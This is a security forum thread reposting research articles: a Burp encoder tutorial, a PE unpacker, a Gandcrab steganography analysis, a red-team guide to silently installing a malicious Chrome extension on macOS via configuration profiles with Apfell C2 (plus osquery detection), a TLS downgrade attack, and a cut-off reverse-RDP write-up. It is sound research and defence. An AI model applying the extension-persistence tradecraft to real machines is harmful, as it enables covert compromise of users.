from exceptions_fix import FixBurpExceptions except ImportError: pass import base64 import urllib import binascii import cgi import json ... # Add the custom tab to Burp's UI callbacks.addSuiteTab(self) return # Implement the functions from the button clicks def encode(self, event): """Encodes the user input and writes the encoded value to text fields. """ self.b64EncField.text = base64.b64encode(self.textArea.text) self.urlEncField.text = urllib.quote(self.textArea.text) self.asciiHexEncField.text = binascii.hexlify(self.textArea.text) self.htmlEncField.text = cgi.escape(self.textArea.text) self.jsEncField.text = json.dumps(self.textArea.text) # Implement ITab def getTabCaption(self): … The encode method sets the text on the encode fields we created by encoding whatever the user types in the top text area (self.textArea.text). Once you save and unload/reload the file you should have full encoding functionality. And that’s it! The process is the same for the other tabs, and if you’re interested in the whole extension, it is available on my GitHub. Hopefully this post makes developing your own extensions a little easier. It was definitely a good learning experience for me. Feedback is welcome. Sursa: https://laconicwolf.com/2019/02/07/burp-extension-python-tutorial-encode-decode-hash/
  18. Un{i}packer Unpacking PE files using Unicorn Engine The usage of runtime packers by malware authors is very common, as it is a technique that helps to hinder analysis. Furthermore, packers are a challenge for antivirus products, as they make it impossible to identify malware by signatures or hashes alone. In order to be able to analyze a packed malware sample, it is often required to unpack the binary. Usually this means, that the analyst will have to manually unpack the binary by using dynamic analysis techniques (Tools: OllyDbg, x64Dbg). There are also some approaches for automatic unpacking, but they are all only available for Windows. Therefore when targeting a packed Windows malware the analyst will require a Windows machine. The goal of our project is to enable platform independent automatic unpacking by using emulation. Supported packers UPX: Cross-platform, open source packer ASPack: Advanced commercial packer with a high compression ratio PEtite: Freeware packer, similar to ASPack FSG: Freeware, fast to unpack Usage Install r2 and YARA pip3 install -r requirements.txt python3 unipacker.py For detailed instructions on how to use Un{i}packer please refer to the Wiki. Additionally, all of the shell commands are documented. To access this information, use the help command Sursa: https://github.com/unipacker/unipacker
  19. Super Mario Oddity A few days ago, I was investigating a sample piece of malware where our static analysis flagged a spreadsheet as containing a Trojan but the behavioural trace showed very little happening. This is quite common for various reasons, but one of the quirks of how we work at Bromium is that we care about getting malware to run and fully detonate within our secure containers. This enables our customers to understand the threats they are facing, and to take any other remedial action necessary without any risk to their endpoints or company assets. Running their malware actually makes our customers more secure. A quick look at the macros in this spreadsheet revealed that it was coded to exit Excel immediately if the machine was not based in Italy (country 39): We often see malware samples failing to run based on location, but usually they look for signs of being in Russia. This is widely believed to help groups based there avoid prosecution by local authorities, but of course leads to false-flag usage too. My interest was piqued, so I modified the document to remove this check so it would open and then I could see if we could get the malware to detonate. The usual social engineering prompt is displayed on opening: Roughly translated as ‘It’s not possible to view the preview online. To view the content, you need to click on “enable edit” and “enable content”’. After modifying the spreadsheet, the malware detonates inside one of our containers. We see the usual macro-based launch of cmd.exe and PowerShell with obfuscated arguments. This is very run-of-the-mill, but these arguments stood out as not being from one of the usual obfuscators we see, so I was determined to dig a bit deeper: (truncated very early) As a side note, malware authors actually spend quite a lot of effort on marketing, including often mentioning specific researchers by name within samples. This happens because of the nature of modern Platform Criminality – malware is licensed to affiliates for distribution, and in order to attract the most interest and best prices malware authors need to make a name for themselves. It’s not clear whether or not this sample was actually trying to encourage me to investigate or not, but sometimes huge clues like this are put into samples on purpose. The binary strings are just a list of encoded characters, so this was easily reconstructed to the following code, which looks like PowerShell: At this point, things seemed particularly interesting. My PowerShell skills are basic, but it looks like this sample is trying to download an image and extract some data from the pixel values. There was only one person to turn to – our PowerShell evangelist and polymath Tim Howes, who was also intrigued. Meanwhile, I pulled the images, with each looking roughly like this: (I’ve slightly resized and blurred). Steganographic techniques such as using the low-bits from pixel values are clearly not new, but it’s rare that we see this kind of thing in malspam; even at Bromium, where we normally see slightly more advanced malware that evaded the rest of the endpoint security stack. It’s also pretty hard to defend against this kind of traffic at the firewall. Now over to Tim to make sense of the PowerShell plumbing. A manual re-shuffle to de-obfuscate the code and you can see more clearly the bitwise operation on the blue and green pixels. Since only the lower 4 bits of blue and green have been used, this won’t make a big difference to the image when looked at by a human, but it is quite trivial to hide some code within. Recasting the above code to a different form makes slightly more sense of where in the image we’re extracting from: This equates to the area in blue at the top of the image here: The above code is finding the next level of code from the blue and green channel from pixels in a small region of the image. The lower bits of each pixel are used as adjustments to these and yield minimal differences to the perceived image. Running this presents yet more heavily obfuscated PowerShell: We can work through this by noticing that there is another large string (base64 encoded) sliced/diced into 40 parts. This can be reassembled: Looking at the above, we see they are using a .net decompressor; so employing our own local variables to step through each part yields: This gives a resultant stream of yet more PowerShell: We execute the “-split” operations on the large string and then convert to a string: We now see that $str is still more mildly obfuscated PowerShell: There’s another slice/dice to form “iex” (the alias for invoke-expression in PowerShell): ($env:comspec)[4,15,25] == 'iex'. The manually de-obfuscated PowerShell reveals the final level which is dropping and executing from a site, but only if the output of ‘get-culture’ on the machine matches “ita” (for example if the culture is Italian, which matches the earlier targeting attempts). Thanks Tim! We downloaded the samples from the above, including from an Italy-based VPN and were given various samples of Gandcrab ransomware. Gandcrab has seen phenomenal success last year, initially being distributed by exploit kits and becoming especially prevalent in the Far East. I am generally skeptical of malware attribution claims, and the implications of so much obfuscated code hidden within a picture of Mario and checking for an Italian victim are not obvious; for all we know the fictional Wario may be as likely to be responsible as any geopolitical actor. However, a future avenue for investigation here is to examine the encoded affiliate IDs, and compare against samples we have collected from other sources to see if there are patterns for whom this affiliate is targeting. Another key forensic advantage that we have at Bromium is that we partition our isolation at the granularity of a user task (in this instance, the opening of a piece of malspam from an email). This means we can associate each sample with lots of forensic metadata about the task the user was performing, simply because they are from the same container. Mining our set of Gandcrab samples to track the behaviour of their affiliates is definitely a task for another day. Whether or not they are based in a targeted country, our users can open malicious emails safely and transparently with Bromium as our hardware-enforced containers securely isolate the malware from the host system (our princess is in another castle). IOCs: Original Spreadsheet: 3849381059d9e8bbcc59c253d2cbe1c92f7e1f1992b752d396e349892f2bb0e7 Mario image: 2726cd6796774521d03a5f949e10707424800882955686c886d944d2b2a61e0 Other Mario image: 0c8c27f06a0acb976b8f12ff6749497d4ce1f7a98c2a161b0a9eb956e6955362 Ultimate EXEs: ec2a7e8da04bc4e60652d6f7cc2d41ec68ff900d39fc244cc3b5a29c42acb7a4 630b6f15c770716268c539c5558152168004657beee740e73ee9966d6de1753f February 8, 2019 • Category: Threats • By: Matthew Rowen Sursa: https://www.bromium.com/gandcrab-ransomware-code-hiding-in-image/
      • 1
      • Upvote
  20. No Place Like Chrome Christopher Ross Feb 8 Chrome extensions were first introduced to the public in December of 2009 and use HTML, JavaScript, and CSS to extend Chrome’s functionality. Extensions can leverage the Chrome API to block ads, change the browser UI, manage cookies, and even work in conjunction with desktop applications. They’re also restricted by a finite set of permissions that are granted by the user during the installation process. With a rich set of native APIs, Chrome extensions provide a more than adequate alternative for hiding malicious code. With the emergence of EDR products and new security features for macOS and Windows 10, endpoint security has improved. However, there has been a lack of detection capabilities for the use of malicious Chrome extensions on macOS. As a result, they have become an enticing initial access and persistence payload. This post will cover a payload delivery mechanism for extensions on macOS, leveraging the auto update feature for offensive purposes, a practical example using Apfell, and some basic, but actionable detection guidance. Payload Delivery There are a few methods that can be used to legitimately install extensions on macOS. Google forces developers to distribute extensions through the web store. Recently, Google changed their policy so that extensions cannot be installed from third party sites. Adversaries may still host extensions on the web store anyway, but it was a necessary policy change. Alternatively, extensions can be installed on macOS with the use of mobile configuration profiles. Configuration profiles are used on macOS and iOS to manage various settings, including power management, DNS servers, login items, WiFi settings, wallpaper, and even applications like Google Chrome. End-users can install profiles by double-clicking on the file or on the command line with the profiles command. Mobile configuration profiles are XML-formatted and follow a relatively simple format. To create a mobile configuration profile, a payload uuid, application ID, and update url (this will be covered later) are required. For more information on configuration profiles, please refer to this article and this reference. Here is an example that can be used as a template. The ExtensionInstallSources key specifies the URL in which extensions can be installed from. Wildcards can be used in the protocol, host, and URI fields. The ExtensionInstallForceList value refers to a list of extensions that will be installed without the users’ consent and cannot be uninstalled. The PayloadRemovalDisallowed key prevents non-admin users from uninstalling the profile. For other keys that can be used to manage extensions and other Google Chrome settings in general please refer to this. Configuration profiles can be utilized to manage a myriad of settings for macOS and warrant further investigation for additional offensive use cases. An interesting note about configuration profiles; they can can be delivered via email and subsequently, the end-user will not see any prompts from Gatekeeper, MacOS’s code signing enforcement and verification tool. However, the user will be prompted to confirm the installation of a profile. Figure 1 If the profile is unsigned, the end-user will be presented with a second prompt (figure 2) before being prompted for admin credentials. Figure 2 However, when installing a signed profile, the OS will only prompt once for the install and then admin credentials. After the installation, the profile contents can be seen in the Profiles preference pane. If the profile is unsigned, that will be noted in red. Figure 3 Now that the extension policy has been set for Chrome, when the application is opened, it will make a series of web requests to the update URL specified in the profile. The update URL should point to an update manifest file that specifies the application ID and the URL for the extension file (.crx). Refer to the auto update documentation for an example manifest file. Next, Chrome will download the extension and save it to ~/Library/Application Support/Google/Chrome/Default/Extensions/APPID. At this point, the extension is loaded into the browser and executed. Note that during this entire process, the configuration profile is the only component that requires user interaction. Similarly, on Windows, an extension can be silently installed by modifying registry keys noted here. However, if the installation source is a third party site, Chrome will only allow inline installs. This type of install will requires users to browse to your site and then redirect users to the Chrome web store to complete the installation. Auto-Update FTW In order to easily manage bug fixes and security patches, extensions can be automatically updated. When hosting extensions in the Chrome Web Store, Google handles updating your extension. Just upload a new copy of your extension and after a few hours, the browser will update the extension via the web store. For extensions hosted outside the web store, developers have more control. Chrome uses the update url in the manifest.json file to periodically check for updates. During this process, Chrome will read the update manifest file and compare the version in the manifest with the current version of the extension. If the manifest version is higher, the browser will download the newest version of the extension and install it. For an example update manifest, please go here. The update manifest is an XML formatted file that contains the APPID and a URL that points to the .crx file. Auto-update is a particularly useful feature for adversaries. In Figures 4 and 5, a malicious extension uses one domain for standard C2 comms and uses another domain to host the update manifest and extension file. Imagine the scenario where incident response has identified the C2 domain as malicious and blocks all traffic to that domain (1). However, traffic to the update URL is still permitted (2 & 3). An adversary can update the manifest version, change the C2 domain (4), the update URL, and even modify some of the extensions core code. After some time, Google Chrome will make a request to the update URL and load the new version of the extension with new C2 domains. Figure 4 Figure 5 Additionally, if an attacker loses control of the extension, or perhaps it even crashed, they can remotely trigger execution with an update. As long as the extension remains installed, Chrome will continue to try and check for updates. If only the manifest version is updated, Chrome will re-install the extension and trigger it’s execution. Next, we’ll cover how to use a PoC Chrome extension and manage the C2 server with Apfell. Malicious Extensions: IRL Apfell is a post-exploitation framework centered around customization and modularity. The framework targets the macOS platform by default, but a user can create new C2 profiles that target any platform. Apfell is an ideal framework to use for a malicious Chrome extension. Lets walk through configuring a custom C2 profile and generating a payload. 1) For initial setup instructions, please see the apfell documentation here. Once the apfell server is up, register a new user and make yourself an admin. Next, you’ll need to clone the apfell-chrome-ext-payload and apfell-chrome-extension-c2server projects onto your apfell server. 2) Navigate to manage operations -> payload management. The payloads for apfell-jxa and linfell are both defined on this page. For each payload, there are several commands defined. Any of these commands can be modified within the console and then updated in the agent (specifically for apfell-jxa and linfell). At the bottom left corner of the payloads page is an import button. This allows a user to import a custom payload, along with each command, from a json file. Please import this file to save some time creating the payload. If the import was successful, you should see chrome-extension as a new payload type with a few commands to start. Figure 6 3) Now open a terminal session on your apfell server and navigate to the apfell-chrome-extension-c2server project. Run the install.sh script to install golang and compile the server binary. Verify that the server binary compiled successfully and is present in the $HOME/go/src/apfell-chrome-extension-c2server directory. 4) Navigate to Manage Operations -> C2 Profiles. Click on Register C2 profile on the bottom left of the page. Here you’ll provide the name of the profile, description, and supported payloads. Upload the C2 server binary ($HOME/go/src/apfell-chrome-extension-c2server/server) and the C2 client code (./apfell-chrome-ext-payload/apfell/c2profiles/chrome-extension.js) for the extension. Figure 7 5) Once the profile is submitted, the profiles page should update and show the new profile. 6) Back in your terminal session on the apfell server, edit the c2config.json file and choose the options you desire. Figure 8 7) Copy the c2config.json to the apfell/app/c2profiles/default/chrome-extension/ directory. Rename the server binary to <c2profilename>_server. This is necessary in order to start the c2 server from the apfell UI. Now start the C2 server in apfell. Figure 9 😎 Navigate to Create Components -> Create Base Payload. Select chrome-extension for the C2 profile and payload type. Fill out the required parameters (Hostname, Port, Endpoint, SSL, and Interval). Provide the desired filename and then click submit. If all goes well, a success message will be displayed at the top of the page. Figure 10 9) To download the payload, go to Manage Operations -> Payload Management. Now that you’ve setup the extension payload and C2 profile, you can export them to use in other operations. 10) Copy and paste all of the code from the payload into chrome extension project file ./apfell-chrome-ext-payload/apfell/extension-skeleton/src/bg/main.js. Edit the manifest.json file in the extension-skeleton directory and replace all of the *_REPLACE values. The update_url does not need to be a legitimate URL if the auto update feature isn’t used. Figure 11 11) Open Google Chrome, click on More -> More Tools -> Extensions and toggle developer mode. Click on pack extension and select the extension-skeleton directory within the apfell-chrome-ext-payload project. Click on pack extension once again and Chrome will output the .crx file with the private key. Note that you’ll need to keep the private key in order to update the extension. 12) The last piece of information you’ll need is the application ID. Unfortunately, the only way to obtain this is to install the extension and note the ID shown on the extensions page. Drag the extension file (.crx) onto the extensions page to install it. Figure 12 13) Now you have the information needed to create your mobile configuration file and host the update manifest and crx file. Add the application ID and url that points to the crx file to the update manifest file. Then add the application id and update_url to the example mobile configuration file here. Additionally, you’ll need to add in two unique UUIDs. Figure 13 Figure 14 14) Now the setup is complete! If everything is properly configured, installing the mobile configuration profile should trigger a silent install of the extension and add a new callback on the apfell active callbacks page. Refer to the Payload Delivery section for details on installing the profile. Figure 15 Here’s a quick demonstration of delivering a malicious chrome extension via a mobile configuration profile. Detection In the target infection section, we briefly covered a delivery mechanism for chrome extensions that allows for silent and hidden installs via mobile configuration profiles. From a defensive perspective, detections for this delivery mechanism should be focused on the *profiles *command and its arguments. This would be most suitable in a situation where the attacker already has access to the victim host. Specifically, the command for installing a profile looks like this:profiles install -type=configuration -path=/path/to/profile.mobileconfig . The corresponding osquery rule would look like this: “SELECT * FROM process_events WHERE cmdline=’%profiles install%’;”. This may not be the best answer in an enterprise environment but its a solid starting point. Also note that the osquery schema now includes a chrome extensions table. Additionally, when a profile is installed through the UI, the MCXCompositor process writes a binary plist to the /Library/Managed Preferences/username/ directory. The plist file is a copy of the mobile configuration profile. The filename is determined by the PayloadType key in the configuration profile. Figure 16 There may be other data sources that enable more robust detections for the use of mobile configuration profiles but this should serve as a good start. Google Chrome extensions should definitely be considered for initial access and persistence. I would encourage other red teamers and security researchers to investigate the Chrome APIs for additional functionality. Originally published at www.xorrior.com. Sursa: https://posts.specterops.io/no-place-like-chrome-122e500e421f
  21. Downgrade Attack on TLS 1.3 and Vulnerabilities in Major TLS Libraries On November 30, 2018. We disclosed CVE-2018-12404, CVE-2018-19608, CVE-2018-16868, CVE-2018-16869, and CVE-2018-16870. These were from vulnerabilities found back in August 2018 in several TLS libraries. Back on May 15, I approached Yuval Yarom with a few issues I had found in some TLS implementations. This led to a collaboration between Eyal Ronen, Robert Gillham, Daniel Genkin, Adi Shamir, Yuval Yarom and me. Spearheaded by Eyal, the research has now been published here. And as you can see, the inventor of RSA himself is now recommending you to deprecate RSA in TLS. We tested nine different TLS implementations against cache attacks and seven were found to be vulnerable: OpenSSL, Amazon s2n, MbedTLS, Apple CoreTLS, Mozilla NSS, WolfSSL, and GnuTLS. The cat is not dead yet, with two lives remaining thanks to BearSSL (developed by my colleague Thomas Pornin) and Google's BoringSSL. The attack leverages a side-channel leak via cache access timings of these implementations in order to break the RSA key exchanges of TLS implementations. The attack is interesting from multiple points of view (besides the fact that it affects many major TLS implementations): It affects all versions of TLS (including TLS 1.3) and QUIC. Where the latter version of TLS does not even offer an RSA key exchange! This prowess is achieved because of the only known downgrade attack on TLS 1.3. It uses state-of-the-art cache attack techniques. Flush+Reload? Prime+Probe? Branch-Predition? We have it. The attack is very efficient. We found ways to ACTIVELY target any browser, slow some of them down, or use the long tail distribution to repeatdly try to break a session. We even make use of lattices to speed up the problem. Manger and Ben-Or on RSA PKCS#1 v1.5. You heard of Bleichenbacher's million messages attack? Guess what, we found better. We use Manger's OAEP attack on RSA PKCS#1 v1.5 and even Ben-Or's algorithm which is more efficient than and was published BEFORE Bleichenbacher's work in 1998. I uploaded some of the code here. To learn more about the research, you should read the white paper. I will talk specifically about protocol-level exploitation in this blog post. Attacking RSA, The Origins Although the research of Ben-Or et al. was initially used to support the security proofs of RSA, it also outlined attacks on the protocol. Fifteen years later, in 1998, Daniel Bleichenbacher discovers a padding oracle and devises a unique and practical attack of his own on RSA. The consequences are severe. Most TLS implementations could be broken, and thus mitigations were designed to prevent Daniel's attack. Follows a long series of "re-discovery" in which the world realizes that it is not so easy to implement the advised mitigations: Bleichenbacher (CRYPTO 1998) also called the 1 million message attack, BB98, padding oracle attack on PKCS#1 v1.5, etc. Klima et al. (CHES 2003) Blei­chen­ba­cher’s At­tack Strikes Again: Brea­king PKCS#1 V1.5 In Xml En­cryp­ti­on (ESORICS 2012) Degabriele et al. (CT-RSA 2012) Bardou et al. (CRYPTO 2012) Cross-Tenant Side-Channel Attacks in PaaS Clouds (CCS 2014) Revisiting SSL/TLS Implementations: New Bleichenbacher Side Channels and Attacks (USENIX 2014) On the Security of TLS 1.3 and QUIC Against Weaknesses in PKCS#1 v1.5 Encryption (CCS 2015) DROWN (USENIX 2016) Return Of Bleichenbacher's Oracle Threat (USENIX 2018) The Dangers of Key Reuse: Practical Attacks on IPsec IKE (USENIX 2018) Let's be realistic, the mitigations that developers had to implement were unrealistic. Furthermore, an implementation that would attempt to log such attacks would actually help the attacks. Isn't that funny? The research I'm talking about today can be seen as one more of these "re-discoveries." My previous boss' boss (Scott Stender) once told me: "You can either be the first paper on the subject, or the best written one, or the last one." We're definitely not the first one, I don't know if we write that well, but we sure are hoping to be the last one RSA in TLS? Briefly, SSL/TLS (except TLS 1.3) can use an RSA key exchange during a handshake to negotiate a shared secret. An RSA key exchange is pretty straight forward: The client encrypts a shared secret under the server's RSA public key, then the server receives it and decrypts it. If we can use our attack to decrypt this value, we can then passively decrypt the session (and obtain a cookie for example), or we can actively impersonate one of the peer. Attacking Browsers, In Practice. We employ the BEAST-attack model (in addition to being colocated with the victim server for the cache attack) which I have previously explained in a video here. Beast With this position, we then attempt to decrypt the session between a victim client (Bob) and bank.com: we can serve him with some javascript content that will continuously attempt new connections on bank.com. (If it doesn't attempt a new connection, we can force it by making the current one fail since we're in the middle.) Why several connections instead of just one? Because most browsers (except Firefox which we can fool) will time out after some time (usually 30s). If an RSA key exchange is negotiated between the two peers: it's great, we have all the time in the world to passively attack the protocol. If an RSA key exchange is NOT negotiated: we need to actively attack the session to either downgrade or fake the server's RSA signature (more on that later). This takes time, because the attack requires us to send thousands of messages to the server. It will likely fail. But if we can try again, many times? It will likely succeed after a few trials. And that is why we continuously send connection attempts to bank.com. Attacking TLS 1.3 Two ways exist to attack TLS 1.3. In each attack, the server needs to support an older version of the protocol as well. The first technique relies on the fact that the current server’s public key is an RSA public key, used to sign its ephemeral keys during the handshake, and that the older version of TLS that the server supports re-use the same keys. The second one relies on the fact that both peers support an older version of TLS with a cipher suite supporting an RSA key exchange. While TLS 1.3 does not use the RSA encryption algorithm for its key exchanges, it does use the signature algorithm of RSA for it; if the server’s certificate contains an RSA public key, it will be used to sign its ephemeral public keys during the handshake. A TLS 1.3 client can advertise which RSA signature algorithm it wants to support (if any) between RSA and RSA-PSS. As most TLS 1.2 servers already provide support for RSA , most will re-use their certificates instead of updating to the more recent RSA-PSS. RSA digital signatures specified per the standard are really close to the RSA encryption algorithm specified by the same document, so close that Bleichenbacher’s decryption attack on RSA encryption also works to forge RSA signatures. Intuitivelly, we have pmse and the decryption attack allows us to find (pmse)d = pms, for forging signatures we can pretend that the content to be signed tbs (see RFC 8446) is tbs = pmse and obtain tbsd via the attack, which is by definition the signature over the message tbs. However, this signature forgery requires an additional step (blinding) in the conventional Bleichenbacher attack. In practice this can lead to hundreds of thousands of additional messages. The TLS 1.3 signature forgery attack using a TLS 1.2 server as Bleichenbacher oracle. Key-Reuse has been shown in the past to allow for complex cross-protocol attacks on TLS. Indeed, we can successfully forge our own signature of the handshake transcript (contained in the CertificateVerify message) by negotiating a previous version of TLS with the same server. The attack can be carried if this new connection exposes a length or bleichenbacher oracle with a certificate using the same RSA key but for key exchanges. Downgrading to TLS 1.2 Every TLS connection starts with a negotiation of the TLS version and other connection attributes. As the new version of TLS (1.3) does not offer an RSA key exchange, the exploitation of our attack must first begin with a downgrade to an older version of TLS. TLS 1.3 being relatively recent (August 2018), most servers supporting it will also support older versions of TLS (which all provide support for RSA key exchanges). A server not supporting TLS 1.3 would thus respond with an older TLS version’s (TLS 1.2 in our example) serverHello message. To downgrade a client’s connection attempt, we can simply spoof this answer from the server. Besides protocol downgrades, other techniques exist to force browser clients to fallback onto older TLS versions: network glitches, a spoofed TCP RST packet, a lack of response, etc. (see POODLE) The TLS 1.3 attack downgrades the victim to an older version of TLS. Continuing with a spoofed TLS 1.2 handshake, we can simply present the server’s RSA certificate in a ServerCertificate message and then end the handshake with a ServerHelloDone message. At this point, if the server does not have a trusted certificate allowing for RSA key exchanges, or if the client refuse to support RSA key exchanges or older versions than TLS 1.2, the attack is stopped. Otherwise, the client uses the RSA public key contained in the certificate to encrypt the TLS premaster secret, sends it in a ClientKeyExchange message and ends its part of the handshake with a ChangeCipherSpec and a Finished messages. The Decryption Attack performs a new handshake with the server, using a modified encrypted premaster secret obtained from the victim’s ChangeCipherSpec message. At this point, we need to perform our attack in order to decrypt the RSA encrypted premaster secret. The last Finished message that we send must contains an authentication tag (with HMAC) of the whole transcript, in addition of being encrypted with the transport keys derived from the premaster secret. While some clients will have no handshake timeouts, most serious applications like browsers will give up on the connection attempt if our response takes too much time to arrive. While the attack only takes a few thousand messages, this might still be too much in practice. Fortunately, several techniques exist to slow down the handshake: we can send the ChangeCipherSpec message which might reset the client’s timer we can send TLS warning alerts to reset the handshake timer Once the decryption attack terminates, we can send the expected Finished message to the client and finalize the handshake. From there everything is possible, from passively relaying and observing messages to the impersonated server through to actively tampering requests made to it. This downgrade attack bypasses multiple downgrade mitigations: one server-side and two client-side. TLS 1.3 servers that negotiate older versions of TLS must advertise this information to their peers. This is done by setting a quarter of the bytes from the server_random field in the ServerHello message to a known value. TLS 1.3 clients that end up negotiating an older version of TLS must check for these values and abort the handshake if found. But as noted by the RFC, “It does not provide downgrade protection when static RSA is used.” – Since we alter this value to remove the warning bytes, the client has no opportunity to detect our attack. On the other hand, a TLS 1.3 client that ends up falling back to an older version of TLS must advertise this information in their subsequent client hellos, since we impersonate the server we can simply ignore this warning. Furthermore, a client also includes the version used by the client hello inside of the encrypted premaster secret. For the same reason as previously, this mitigation has no effect on our attack. As it stands, RSA is the only known downgrade attack on TLS 1.3, which we are the first to successfuly exploit in this research. Attacking TLS 1.2 As with the previous attack, both the client and the server targetted need to support RSA key exchanges. As this is a typical key exchange most known browsers and servers support them, although they will often prefer to negotiate a forward secret key exchange based on ephemeral versions of the Elliptic Curve or Finite Field Diffie-Hellman key exchanges. This is done as part of the cipher suite negotiation during the first two handshake messages. To avoid this outcome, the ClientHello message can be intercepted and modified to strip it out of any non-RSA key exchanges advertised. The server will then only choose from a set of RSA-key-exchange-based cipher suites which will allow us to perform the same attack as previously discussed. Our modification of the ClientHello message can only be detected with the Finished message authenticating the correct handshake transcript, but since we are in control of this message we can forge the expected tag. The attack on TLS 1.2 modifies the client’s first packet to force an RSA key exchange. On the other side, if both peers end up negotiating an RSA key exchange on their own, we can passively observe the connection and take our time to break the session. Take Aways For each vulnerability discovered, there are three pieces of articles you can read: the first paper, the best explanation on the subject, and finally the last paper. We're hoping to be the last paper. The last 20 years of attacks that have been re-discovering Bleichenbacher's seminal work in 1998 clearly show that it is close to impossible to correclty implement the RSA PKCS#1 v1.5 encryption scheme. While our paper recommends a series of mitigations, it is time for RSA PKCS#1 v1.5 to be deprecated and replaced by more modern schemes like OAEP and ECEIS for asymmetric encryption or Elliptic Curve Diffie-Hellman for key exchanges. Finally, we note that keyless implementations of TLS are attractive targets, but are most often closed source and thus were not analyzed in this work. Published date: 07 February 2019 Written by: David Wong Sursa: https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2019/february/downgrade-attack-on-tls-1.3-and-vulnerabilities-in-major-tls-libraries/
      • 1
      • Thanks
  22. Machine Learning for Everyone In simple words. With real-world examples. Yes, again 21 november 2018 :: 28834 views :: 8137 words This article in other languages: Russian (original) Special thanks for help: @wcarss, @sudodoki and my wife ❤️ Machine Learning is like sex in high school. Everyone is talking about it, a few know what to do, and only your teacher is doing it. If you ever tried to read articles about machine learning on the Internet, most likely you stumbled upon two types of them: thick academic trilogies filled with theorems (I couldn’t even get through half of one) or fishy fairytales about artificial intelligence, data-science magic, and jobs of the future. I decided to write a post I’ve been wishing existed for a long time. A simple introduction for those who always wanted to understand machine learning. Only real-world problems, practical solutions, simple language, and no high-level theorems. One and for everyone. Whether you are a programmer or a manager. Let's roll. Why do we want machines to learn? This is Billy. Billy wants to buy a car. He tries to calculate how much he needs to save monthly for that. He went over dozens of ads on the internet and learned that new cars are around $20,000, used year-old ones are $19,000, 2-year old are $18,000 and so on. Billy, our brilliant analytic, starts seeing a pattern: so, the car price depends on its age and drops $1,000 every year, but won't get lower than $10,000. In machine learning terms, Billy invented regression – he predicted a value (price) based on known historical data. People do it all the time, when trying to estimate a reasonable cost for a used iPhone on eBay or figure out how many ribs to buy for a BBQ party. 200 grams per person? 500? Yeah, it would be nice to have a simple formula for every problem in the world. Especially, for a BBQ party. Unfortunately, it's impossible. Let's get back to cars. The problem is, they have different manufacturing dates, dozens of options, technical condition, seasonal demand spikes, and god only knows how many more hidden factors. An average Billy can't keep all that data in his head while calculating the price. Me too. People are dumb and lazy – we need robots to do the maths for them. So, let's go the computational way here. Let's provide the machine some data and ask it to find all hidden patterns related to price. Aaaand it works. The most exciting thing is that the machine copes with this task much better than a real person does when carefully analyzing all the dependencies in their mind. That was the birth of machine learning. Articol complet: https://vas3k.com/blog/machine_learning/
      • 2
      • Like
      • Upvote
  23. Reverse RDP Attack: Code Execution on RDP Clients February 5, 2019 Research by: Eyal Itkin Overview Used by thousands of IT professionals and security researchers worldwide, the Remote Desktop Protocol (RDP) is usually considered a safe and trustworthy application to connect to remote computers. Whether it is used to help those working remotely or to work in a safe VM environment, RDP clients are an invaluable tool. However, Check Point Research recently discovered multiple critical vulnerabilities in the commonly used Remote Desktop Protocol (RDP) that would allow a malicious actor to reverse the usual direction of communication and infect the IT professional or security researcher’s computer. Such an infection could then allow for an intrusion into the IT network as a whole. 16 major vulnerabilities and a total of 25 security vulnerabilities were found overall. The full list can be found in Appendix A & B. Introduction The Remote Desktop Protocol (RDP), also known as “mstsc” after the Microsoft built-in RDP client, is commonly used by technical users and IT staff to connect to / work on a remote computer. RDP is a proprietary protocol developed by Microsoft and is usually used when a user wants to connect to a remote Windows machine. There are also some popular open-source clients for the RDP protocol that are used mainly by Linux and Mac users. RDP offers many complex features, such as: compressed video streaming, clipboard sharing, and several encryption layers. We therefore decided to look for vulnerabilities in the protocol and its popular implementations. In a normal scenario, you use an RDP client, and connect to a remote RDP server that is installed on the remote computer. After a successful connection, you now have access to and control of the remote computer, according to the permissions of your user. But if the scenario could be put in reverse? We wanted to investigate if the RDP server can attack and gain control over the computer of the connected RDP client. Figure 1: Attack scenario for the RDP protocol There are several common scenarios in which an attacker can gain elevated network permissions by deploying such an attack, thus advancing his lateral movement inside an organization: Attacking an IT member that connects to an infected work station inside the corporate network, thus gaining higher permission levels and greater access to the network systems. Attacking a malware researcher that connects to a remote sandboxed virtual machine that contains a tested malware. This allows the malware to escape the sandbox and infiltrate the corporate network. Now that we decided on our attack vector, it is time to introduce our targets, the most commonly used RDP clients: mstsc.exe – Microsoft’s built-in RDP client. FreeRDP – The most popular and mature open-source RDP client on Github. rdesktop – Older open-source RDP client, comes by default in Kali-linux distros. Fun fact: As “rdesktop” is the built-in client in Kali-linux, a Linux distro used by red teams for penetration testing, we thought of a 3rd (though probably not practical) attack scenario: Blue teams can install organizational honeypots and attack red teams that try to connect to them through the RDP protocol. Open-Source RDP clients As is usually the case, we decided to start looking for vulnerabilities in the open source clients. It seems that it will only make sense to start reverse engineer Microsoft’s client after we will have a firm understanding of the protocol. In addition, if we find common vulnerabilities in the two open sourced clients, we could check if they also apply to Microsoft’s client. In a recon check it looked like “rdesktop” is smaller than “FreeRDP” (has fewer lines of code), and so we selected it as our first target. Note: We decided to perform an old-fashioned manual code audit instead of using any fuzzing technique. The main reasons for this decision were the overhead of writing a dedicated fuzzer for the complex RDP protocol, together with the fact that using AFL for a protocol with several compression and encryption layers didn’t look like a good idea. rdesktop Tested version: v1.8.3 After a short period, it looked like the decision to manually search for vulnerabilities paid off. We soon found several vulnerable patterns in the code, making it easier to “feel” the code, and pinpoint the locations of possible vulnerabilities. We found 11 vulnerabilities with a major security impact, and 19 vulnerabilities overall in the library. For the full list of CVEs for “rdesktop”, see Appendix A. Note: An additional recon showed that the xrdp open-source RDP server is based on the code of “rdesktop”. Based on our findings, it appears that similar vulnerabilities can be found in “xrdp” as well. Instead of a technical analysis of all of the CVEs, we will focus on two common vulnerable code patterns that we found. Remote Code Executions – CVEs 2018-20179 – 2018-20181 Throughout the code of the client, there is an assumption that the server sent enough bytes to the client to process. One example for this assumption can be found in the following code snippet in Figure 2: Figure 2: Parsing 2 fields from stream “s” without first checking its size As we can see, the fields “length” and “flags” are parsed from the stream “s”, without checking that “s” indeed contains the required 8 bytes for this parsing operation. While this usually only leads to an Out-Of-Bounds read, we can combine this vulnerability with an additional vulnerability in several of the inner channels and achieve a much more severe effect. There are three logical channels that share a common vulnerability: lspci rdpsnddbg – yes, this debug channel is always active seamless The vulnerability itself can be seen in Figure 3: Figure 3: Integer-Underflow when calculating the remaining “pkglen” By reading too much data from the stream, i.e. sending a chopped packet to the client, the invariant that “s->p <= s->end” breaks. This leads to 